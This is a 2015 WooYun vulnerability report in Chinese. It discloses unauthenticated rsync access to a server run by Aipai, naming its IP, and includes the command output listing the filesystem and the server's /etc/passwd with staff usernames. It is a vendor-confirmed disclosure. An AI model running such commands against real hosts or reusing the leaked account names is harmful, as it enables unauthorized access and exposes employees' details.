当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125448

漏洞标题:爱拍某站rsync未授权可读取passwd文件

相关厂商:爱拍

漏洞作者: myhalo

提交时间:2015-07-09 11:27

修复时间:2015-08-24 16:10

公开时间:2015-08-24 16:10

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-10: 厂商已经确认,细节仅向厂商公开
2015-07-20: 细节向核心白帽子及相关领域专家公开
2015-07-30: 细节向普通白帽子公开
2015-08-09: 细节向实习白帽子公开
2015-08-24: 细节向公众公开

简要描述:

扫~~~

详细说明:

1.png


ip:121.10.245.222

漏洞证明:

root@k:~# rsync 121.10.245.222::udr
drwxr-xr-x 4096 2015/04/13 17:34:59 .
lrwxrwxrwx 30 2015/03/23 19:41:10 initrd.img
lrwxrwxrwx 26 2015/03/23 19:41:10 vmlinuz
drwxr-xr-x 4096 2015/04/08 14:29:56 appex
drwxr-xr-x 4096 2015/03/25 15:03:27 bin
drwxr-xr-x 4096 2015/03/23 22:22:06 boot
drwxr-xr-x 4096 2015/04/13 17:34:59 data
drwxr-xr-x 3040 2015/03/25 11:09:19 dev
drwxr-xr-x 4096 2015/06/30 18:53:38 etc
drwxr-xr-x 4096 2015/06/11 14:13:59 home
drwxr-xr-x 4096 2015/03/25 15:09:25 lib
drwxr-xr-x 4096 2015/03/23 22:21:05 lib64
drwxr-xr-x 4096 2015/03/23 19:39:18 media
drwxr-xr-x 4096 2013/12/04 19:31:54 mnt
drwxr-xr-x 4096 2015/06/25 15:05:40 opt
dr-xr-xr-x 0 2015/03/25 11:09:11 proc
drwxr-xr-x 740 2015/07/08 17:39:13 run
drwxr-xr-x 4096 2015/03/23 22:29:51 sbin
drwxr-xr-x 4096 2012/06/10 14:35:49 selinux
drwxr-xr-x 4096 2015/04/27 15:00:43 srv
drwxr-xr-x 0 2015/03/25 11:09:13 sys
drwxrwxrwt 4096 2015/07/08 18:42:21 tmp
drwxr-xr-x 4096 2015/03/23 19:39:49 usr
drwxr-xr-x 4096 2015/03/23 22:23:24 var


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
snmp:x:103:106::/var/lib/snmp:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
ntp:x:105:107::/home/ntp:/bin/false
messagebus:x:106:108::/var/run/dbus:/bin/false
zouguangxian:x:1000:1003::/home/zouguangxian:/bin/bash
zhajm:x:1001:1004::/home/zhajm:/bin/bash
hefalin:x:1002:1005::/home/hefalin:/bin/bash
oumingzhu:x:1003:1006::/home/oumingzhu:/bin/bash
liujin:x:1004:1007::/home/liujin:/bin/bash
zl:x:1005:1008::/home/zl:/bin/bash
salt:x:1006:1009::/home/salt:/bin/bash
zenoss:x:1007:1010::/home/zenoss:/bin/bash
clamav:x:1008:1011::/home/clamav:/bin/sh
rsyncer:x:1009:1012::/home/rsyncer:/bin/bash
chenbin:x:1010:1013::/home/chenbin:/bin/bash
jasxio:x:1011:1014::/home/jasxio:/bin/bash

修复方案:

找运维

版权声明:转载请注明来源 myhalo@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-10 16:09

厂商回复:

感谢反馈!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-03 01:16 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    求解这是怎么读取的?

  2. 2015-09-03 01:16 | _Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))

    ...原来如此。